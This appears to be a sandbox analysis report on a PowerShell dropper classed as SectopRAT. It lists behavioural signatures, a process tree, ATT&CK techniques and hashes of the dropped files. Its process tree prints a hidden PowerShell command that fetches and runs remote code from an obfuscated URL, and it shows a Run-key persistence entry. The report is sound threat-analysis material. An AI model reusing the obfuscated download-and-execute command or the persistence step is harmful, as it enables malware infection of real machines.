sectoprat | b59c1eea07af1ef9c70705b34f09f3929b12c4df4e31597c0f62a8847157ed1f

Analysis

max time kernel
102s
max time network
95s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
26/03/2025, 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

141B
MD5

6fe6ee6a496894b815dd186af8babae5
SHA1

513ccf808eeeadd1d3d2c177e74534badb86fcfe
SHA256

b59c1eea07af1ef9c70705b34f09f3929b12c4df4e31597c0f62a8847157ed1f
SHA512

11e8b51b7af82c2221a4a863abff54405781be1e4751a6b408f4dd88762a53273eb2b8e89ad611444c47d9c043224773be340561d780dd99ab74777c8256c795

Score

10^/10

sectoprat discovery execution persistence rat trojan

Malware Config

Signatures

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/5216-110-0x0000000000E00000-0x0000000000ED4000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	1188	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
6064	kato.exe
3776	kato.exe
2964	TiVoDiag.exe
4460	TiVoDiag.exe

Loads dropped DLL 7 IoCs

pid	Process
3776	kato.exe
2964	TiVoDiag.exe
2964	TiVoDiag.exe
2964	TiVoDiag.exe
4460	TiVoDiag.exe
4460	TiVoDiag.exe
4460	TiVoDiag.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kato.exe = "C:\\Users\\Admin\\AppData\\Roaming\\KD8Y0n1n\\kato.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4612	powershell.exe
1188	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4460 set thread context of 5932	4460	TiVoDiag.exe	97
PID 5932 set thread context of 5216	5932	cmd.exe	99

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TiVoDiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TiVoDiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4612	powershell.exe
4612	powershell.exe
1188	powershell.exe
1188	powershell.exe
2964	TiVoDiag.exe
4460	TiVoDiag.exe
4460	TiVoDiag.exe
5932	cmd.exe
5932	cmd.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4460	TiVoDiag.exe
5932	cmd.exe
5932	cmd.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	5216	MSBuild.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4612 wrote to memory of 1188	4612	powershell.exe	84
PID 4612 wrote to memory of 1188	4612	powershell.exe	84
PID 1188 wrote to memory of 6064	1188	powershell.exe	93
PID 1188 wrote to memory of 6064	1188	powershell.exe	93
PID 6064 wrote to memory of 3776	6064	kato.exe	94
PID 6064 wrote to memory of 3776	6064	kato.exe	94
PID 3776 wrote to memory of 2964	3776	kato.exe	95
PID 3776 wrote to memory of 2964	3776	kato.exe	95
PID 3776 wrote to memory of 2964	3776	kato.exe	95
PID 2964 wrote to memory of 4460	2964	TiVoDiag.exe	96
PID 2964 wrote to memory of 4460	2964	TiVoDiag.exe	96
PID 2964 wrote to memory of 4460	2964	TiVoDiag.exe	96
PID 4460 wrote to memory of 5932	4460	TiVoDiag.exe	97
PID 4460 wrote to memory of 5932	4460	TiVoDiag.exe	97
PID 4460 wrote to memory of 5932	4460	TiVoDiag.exe	97
PID 4460 wrote to memory of 5932	4460	TiVoDiag.exe	97
PID 5932 wrote to memory of 5216	5932	cmd.exe	99
PID 5932 wrote to memory of 5216	5932	cmd.exe	99
PID 5932 wrote to memory of 5216	5932	cmd.exe	99
PID 5932 wrote to memory of 5216	5932	cmd.exe	99
PID 5932 wrote to memory of 5216	5932	cmd.exe	99

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W H "&{ iex ( iwr ( ('https://[email protected]/temp/wEotIbaw#.txt') -split '[#@*]+' -join '' ) -UseBasicParsing ).Content }"
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe
    "C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:6064
  - - C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe
      "C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe" -burn.filehandle.attached=640 -burn.filehandle.self=644
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe
        
        C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2964
      - C:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exe
        
        C:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:4460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:5932
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
d284e7ae3997969d312c6e20c8eaa3ac

SHA1
7681d49355053dc9efae6ba5bd893ba0518f9315

SHA256
03bdec025bd5fdc7bcf3efa6d4baf21d6cdedde935bceda65858a30125d4b456

SHA512
47b4b62f6099eea6a5a84e7ff246f7f537db22e36039b8b1ec95e8375723c5185afc8e5581f7f3f25931c701d36bbe562fcdc68499aa5916ef4bb1a366bd1e6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
067b7e92295dc36fa9e6293641ff06e1

SHA1
7da84ff603265697db7ef5afd6286d30292e04b9

SHA256
c54f69103b33c8e778c945142dfc3db4cdc439171c46fda006d3fe47cd8e8417

SHA512
df3719a351346a89776064162800797aebbf6f104de51cc97cf1f03f50eb1d99ff77a7d39c10a3497319268fd3b5a8486ecf36dccd2386af93e7b404e64be764

Download Submit
C:\Users\Admin\AppData\Local\Temp\99240085

Filesize
1.6MB

MD5
72128553c9b8eb2e14330a6484cfd5ee

SHA1
475b5201ae76c420a813b539723a74e19a6e744b

SHA256
746a17b27bc23765245abd6d64944b05d1c879f9926f31744bd06882120c6a89

SHA512
5243ab89fa9995fbfcf45db53848ef7b128e915b3f3947c0bb70a773b7d94bbd1fee0fb308802f79508b3965fe0accd959f27def6883895dff47b4e29398dca7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srvccaay.2ak.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe

Filesize
3.0MB

MD5
e5f6219b54266957ab0da8224f0fd830

SHA1
cb5d9bc8901daea8fcc4ed4b97aaaa1651ead30c

SHA256
a4c67af2f732b249f2879a3334006713a8f0aa07f771a80065cbfa6b4637a403

SHA512
83fbef2bdc90e61f622769f0f28936388dad7cf321f1df67af9819724de1d65a4d5624b885bbda80ac8a372e5408585adbef34860e43d54fc12e456182e5564e

Download Submit
C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\MindClient.dll

Filesize
467KB

MD5
c058b36fb6b007c2920604229b1fa0a3

SHA1
1377c5c47f08ffabb6a3359cdc2c3b5c8df958bb

SHA256
37cc3ebff3b7b7e55e8a8cc8785449152c6b119d25bacc6671b089dca7998ca2

SHA512
a53f211cae71d083bb3fd6c2918384ed00a5b35cf67f28544303111e05abbc464b8033d649957a0665ff32c2180b594e3fbd66f90c4f783e2e8ee5d6865108c3

Download Submit
C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\rendzina.yml

Filesize
1.3MB

MD5
7b0a2c7dcbaf47949428b8f82570fa89

SHA1
c85af70092b1d97d28aef786e97507c748359724

SHA256
f3b12aa0fa6d27a0c9401d0c0b7a564b342a7e1d65f0827a139ac505db0d4e85

SHA512
7377ebe6e2fc625718c8a94b190b5ec211307a4dbb672dcbc1efc95cc57a26138ebc150b52aea06cc26002ad0bdd876eb8bb6cbe8303b9fd51646fe29f4d1f08

Download Submit
C:\Windows\Temp\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\Knockwurst.dll

Filesize
1.3MB

MD5
9882ac3b1c5d3f27475cdcf2edd6694f

SHA1
3a01679cab83c493ed0bcd946c50c2c675a0a270

SHA256
6a73fb33a020f62b03ba576d4627ec87f1d7af73066a16a5290b4db0042c0b3c

SHA512
7a35ed2179b479afebbf386b7cbd5c2d301cc2778708dfcebb5ac2c658d86578b1161149a66623f18dd0b193da5acc819f27d14ef2f703567ee84a7b67f4d992

Download Submit
C:\Windows\Temp\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe

Filesize
815KB

MD5
379ba636ef26aa22b2636bb0ba2876d2

SHA1
5d1b53d63b9de9138e1a679a928d9cf34413711f

SHA256
70ea7dcb7e15202e806cf8e3d3f250c1432c1af01c25a440f55fd07eec4913ad

SHA512
066a456cc7ae9b16e5293cf979d5f0bae2ad095b76925a7f9aa1ab184d468b40bbe6d81655fb97766d786fa1bc7174f3c5b76f6e0de3205f60e09a4e69f992f5

Download Submit
C:\Windows\Temp\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\shieldfern.doc

Filesize
55KB

MD5
df4f621ea64bac21c2051ef4a2e9cb30

SHA1
03cc13749b9b73223df4820d9568b262488aacab

SHA256
e2f35cd3969c76969aca8720d6bd3bdc4b2d77785c797c2b51ff9646aea7e3e6

SHA512
c3efe090cb9f0363c80c60e1f1b4e8a0688a26ed6062aaa9df0afbaa6700227fe8527e21dcb03442ff99f4a8c1a02e021c5520102f55311a7a56798708f37158

Download Submit
C:\Windows\Temp\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\wspconfig.dll

Filesize
535KB

MD5
b86ca5c4e56fedb923332528bf09ef48

SHA1
251ba312b1461270d866510fb7fc9b8dd42740d3

SHA256
08f820cffb07375c795ab336dc248be94457e44f6b2fabd3c6d27230a41d98d2

SHA512
c6d71ff960dc288931443cbfb9a3786b317f19206359d4842f7e3d1c304a4cd61a177ed058899da678bc2ba50b4235e4267889762cd98c46e4d0a35d0523cfc8

Download Submit
C:\Windows\Temp\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe

Filesize
2.9MB

MD5
ee5d43fee47f62dc57e5e509fd6a9056

SHA1
0dafc5b4458d61986988dcf7e90c4ab5c13d15de

SHA256
1c331c776a850d970d39be136659746c0729c393b6e6c934f1ab1c9075f76973

SHA512
e2180ca5d43b87723705bb9a4a4e1c13bea2f8bf12aa7bb798cdbf68b5acc6c731d8c07b839b2e1749c8c6135899201a2389bc75669301337ec7da46b0827ec5

Download Submit
memory/1188-29-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-26-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-30-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-32-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-33-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-35-0x000001769DA60000-0x000001769DA6A000-memory.dmp

Filesize
40KB

Download
memory/1188-36-0x000001769DA90000-0x000001769DAA2000-memory.dmp

Filesize
72KB

Download
memory/1188-23-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-57-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-22-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/1188-25-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/2964-89-0x00007FFBFFCD0000-0x00007FFBFFEC8000-memory.dmp

Filesize
2.0MB

Download
memory/2964-84-0x0000000000AA0000-0x0000000000B19000-memory.dmp

Filesize
484KB

Download
memory/2964-88-0x0000000075150000-0x00000000752CB000-memory.dmp

Filesize
1.5MB

Download
memory/4460-98-0x0000000075150000-0x00000000752CB000-memory.dmp

Filesize
1.5MB

Download
memory/4460-94-0x0000000000A90000-0x0000000000B1A000-memory.dmp

Filesize
552KB

Download
memory/4460-97-0x00007FFBFFCD0000-0x00007FFBFFEC8000-memory.dmp

Filesize
2.0MB

Download
memory/4460-96-0x0000000075150000-0x00000000752CB000-memory.dmp

Filesize
1.5MB

Download
memory/4612-31-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-11-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-28-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-0-0x00007FFBE19F3000-0x00007FFBE19F5000-memory.dmp

Filesize
8KB

Download
memory/4612-12-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-27-0x00007FFBE19F3000-0x00007FFBE19F5000-memory.dmp

Filesize
8KB

Download
memory/4612-75-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-24-0x00007FFBE19F0000-0x00007FFBE24B2000-memory.dmp

Filesize
10.8MB

Download
memory/4612-1-0x000001562A750000-0x000001562A772000-memory.dmp

Filesize
136KB

Download
memory/5216-110-0x0000000000E00000-0x0000000000ED4000-memory.dmp

Filesize
848KB

Download
memory/5216-106-0x0000000074CF0000-0x0000000074F8A000-memory.dmp

Filesize
2.6MB

Download
memory/5216-111-0x00000000054B0000-0x0000000005542000-memory.dmp

Filesize
584KB

Download
memory/5216-112-0x0000000005C10000-0x00000000061B6000-memory.dmp

Filesize
5.6MB

Download
memory/5216-113-0x0000000005580000-0x00000000055D0000-memory.dmp

Filesize
320KB

Download
memory/5216-114-0x0000000005850000-0x0000000005A12000-memory.dmp

Filesize
1.8MB

Download
memory/5932-102-0x0000000075150000-0x00000000752CB000-memory.dmp

Filesize
1.5MB

Download
memory/5932-104-0x0000000075150000-0x00000000752CB000-memory.dmp

Filesize
1.5MB

Download
memory/5932-101-0x00007FFBFFCD0000-0x00007FFBFFEC8000-memory.dmp

Filesize
2.0MB

Download